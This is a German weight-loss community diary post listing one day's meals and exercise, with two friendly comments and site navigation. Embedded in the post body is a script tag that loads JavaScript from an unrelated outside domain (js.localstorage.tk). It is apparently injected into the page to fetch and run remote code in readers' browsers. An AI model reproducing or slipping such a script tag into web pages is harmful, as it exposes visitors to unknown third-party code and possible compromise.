Zum Inhalt springen

Sie sind hier

Tag 36 - Regen

0  0
Am von im Ernährungstagebuch geschrieben

Bei dem Wetter hab ich irgendwie zu nichts richtig Lust Sad Am Liebsten würde ich mich mit nem Kaffee und nem schönen Buch auf die Couch kuscheln Biggrin 

Aber ich muss noch ein bisschen was arbeiten Sad

zum Essen: 

morgens: Müsli mit Milch, Kaffee

mittags: 1 Mini Chicken-Nugget und Tomatensuppe 

abends: 

zwischendurch:

Sport: 60min Hometrainer 

 

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Dieser Eintrag beschäftigt sich (auch) mit einem oder mehrerer meiner Ziele: 
Abnehmen-Themen
Vorheriger Ernährungstagebuch-Eintrag
Bild von Sport - Challenge September
Nächster Ernährungstagebuch-Eintrag
Bild von Schokomaus09 :( ich bekomms nicht hin

Kommentare

Bild des Benutzers DerHutmacher
0  0

Ich fürchte, damit bist du nicht alleine. wink Eigentlich sollte ich auch an meiner Bachelorarbeit sein, aber ich habe gerade keine Lust. Seit der Klausur gestern ist bei mir die Luft weg. Ich merke richtig, wie mein Körper und mein Kopf etwas nach Entspannung schreien. Gönne dir nach Feierabend deine warme Couch! wink Gute Entspannung und beste Grüße
Der Hutmacher

Bild des Benutzers Emma09
0  0

dich Luna - am Donnerstag kommt der Sommer zurück  - versprochen Blum 3

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von Ramona60: rauf auf den Crosstrainer und losgetreten aber nach 30 Minuten war ich zu schlapp um weiter zu machen. Gut, hauptsache etwas sportlich gewesen, ich habe immerhin 210 kcal verbrannt. Vielleicht  geht...
Ziel für den Abnehmplan von Lysander55: Ich habe vorgenommen, jeden Morgen und abends ein Schüssel Müsli zu essen. 
Eintrag in ein Ernährungstagebuch von veilchen: Also gut, seit letzter Woche hats öfter mal süsses gegeben, zu oft. Das soll jetzt ein Ende haben, ab heute gehts wieder gesund weiter. Gestern waren wir auf einer Beisetzung mit anschliessendem...
Ziel für den Abnehmplan von Solveigh: in jedem Anfang wohnt ein Zauber inne.... Anfang ist hierbei gemäß der Definition Anfang in der Diät- Clique.  Es ist toll, von anderen zu lesen, inspiriert zu werden und sich gegenseitig gut zu tun...
Eintrag in ein Ernährungstagebuch von Ramona60: Frühstück: 2 Scheiben glutenfreies Brot, sind nur 50 g das Brot ist sehr leicht, mit Ziegenfrischkäse bestrichen und mit Chicorée und 80 g Putenbrust belegt. Dazu eine Tasse Kaffee mit Mandelmilch....
Eintrag in ein Ernährungstagebuch von EndlichSchlank2019: Gestern ist aus dem Schwimmen nichts geworden, mein Freund hatte andere Pläne. Da hab ich ausnahmsweise nachgegeben   Dafür war ich heute ne Stunde auf dem Hometrainer und hab ein bisschen...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst